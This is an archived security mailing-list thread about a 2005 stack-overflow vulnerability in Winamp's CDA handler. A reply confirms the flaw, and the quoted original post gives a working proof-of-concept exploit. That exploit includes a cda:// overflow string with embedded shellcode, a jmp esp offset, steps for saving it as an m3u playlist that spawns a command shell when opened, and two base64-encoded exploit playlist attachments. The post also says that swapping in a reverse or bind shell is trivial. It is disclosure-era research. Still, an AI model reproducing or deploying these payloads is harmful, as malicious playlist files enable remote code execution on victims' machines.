Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Winamp Exploit (POC) 5.08 Stack Overflow

from [Black Dot] Network Security [Permanent Link]
Subject: Re: Winamp Exploit (POC) 5.08 Stack Overflow
Date: 31 Jan 2005 00:03:36 -0000 
In-Reply-To: <20050128190411.10755.qmail@mail2.securityfocus.com>

Hello!

I have analyzed the vulnerability myself and the information you've given is 
correct. There are two things though that need mentioning.

1. You have given an address where 'jmp esp' command resides. I don't know why, 
yet, but this address on my computer is 0x5F20546E, so as you can see it's 
+0x70000 of your address.

2. The arbitrary code which gets executed must be very short, about 210 bytes, 
because the rest of memory after this length gets overwritten by unknown data.

The vulnerability is exploitable though. If anyone has any ideas, please 
contact me.

Regards,
Black Dot


Received: (qmail 26454 invoked from network); 28 Jan 2005 19:29:12 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) 
(205.206.231.27)
 by mail.securityfocus.com with SMTP; 28 Jan 2005 19:29:12 -0000
Received: from lists2.securityfocus.com (lists2.securityfocus.com 
[205.206.231.20])
      by outgoing3.securityfocus.com (Postfix) with QMQP
      id 271F22370BF; Fri, 28 Jan 2005 12:09:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26723 invoked from network); 28 Jan 2005 11:58:45 -0000
Message-ID: <20050128190411.10755.qmail@mail2.securityfocus.com>
Date: Fri, 28 Jan 2005 20:11:9 +0100
From: "Rojodos" <rojo2_bugtraq@yahoo.es>
To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Subject: Winamp Exploit (POC) 5.08 Stack Overflow
X-mailer: Foxmail 4.1 [eg]
Mime-Version: 1.0
Content-Type: multipart/mixed;
     boundary="=====000_Dragon280534826565_====="

This is a multi-part message in MIME format.

--=====000_Dragon280534826565_=====
Content-Type: text/plain;
     charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hello :)

I=B4ve coded an exploit about this vulnerability, using the=
advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP=
in_cdda.dll CDA Device Name" as a guide. The advisory is very=
good, so it=B4s very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT=
_IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FDx=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0

Should spawn a shell in a WinXP SP1 with Winamp 5.08, I have used=
as offset 0x5f20546e olepro32.dll, a "jmp esp"  (nT _)

=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FDx=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
is the scode in=
"printable" chars.

I wrote the scode sometime ago, in http://foro.elhacker.net Its a=
very very simple scode, with hardcoded system() call (i=B4m a=
noob, sorry xD)

I have used AAAABBBBCCCC... to see how big is the buffer, and to=
see where the ret is overflowed (in 5.08 exactly in HIII)

In Winamp 5.05 works the same code, but the ret is "IIII", so the=
exploit must have another "H":

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT=
_IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FDx=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0

Then, the exploit works fine in Winamp 5.05 and spawns a shell=
:)

I have only tested it in 5.08 and 5.05, but I think that its easy=
to "port" the exploit to another version.

These codes can be saved in a archive type m3u (playlist archive=
Winamp)

If you copy these codes in a text archive like this (Winamp=
5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT=
_IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FDx=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0

(for example, i have used the "demo" archive, DJ Mike Llama and=
edit the PLAY LIST ENTRY)

And save as *.m3u file, if you open this (in this case, I repeat,=
with Winamp 5.08), a cmd shell will appear :)

It=B4s trivial to change the shellcode to make a bindport, reverse=
shell, etc..

I atach two exploits, one for Winamp 5.08 and the other for=
Winamp 5.05 (the are only de special m3u files)           

Sorry about my bad english, I=B4m spanish :)            (Spain=
exists :D)

Greets to http://www.elhacker.net  and http://foro.elhacker.net=
and all the people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards. 

Rojodos

rojo2_bugtraq@yahoo.es
2005-01-28

--=====000_Dragon280534826565_=====
Content-Type: application/octet-stream;
     name="exploit_Winamp-5.05.m3u"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
     filename="exploit_Winamp-5.05.m3u"

I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnRybw0K
Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISEhuVCBfSUpKSovlM/9Xg+wExkX4
Y8ZF+W3GRfpkxkX7LsZF/GXGRf14xkX+ZbhEgL93UI1d+FP/0A0K

--=====000_Dragon280534826565_=====
Content-Type: application/octet-stream;
     name="exploit_Winamp-5.08.m3u"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
     filename="exploit_Winamp-5.08.m3u"

I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnRybw0K
Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISG5UIF9JSkpKi+Uz/1eD7ATGRfhj
xkX5bcZF+mTGRfsuxkX8ZcZF/XjGRf5luESAv3dQjV34U//QDQo=

--=====000_Dragon280534826565_=====--
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: SECURITY.NNOV: Multiple applications fd_set structure bitmap array index overflow, Casper . Dik
Next by Date:  [Full-Disclosure] [ GLSA 200501-46 ] ClamAV: Multiple issues, Sune Kloppenborg Jeppesen
Previous by Thread:  Winamp Exploit (POC) 5.08 Stack Overflow, Rojodos
Next by Thread:  RE: SECURITY.NNOV: Multiple applications fd_set structure bitmap array index overflow, David LeBlanc
Indexes:  [Date] [Thread] [Top] [All Lists]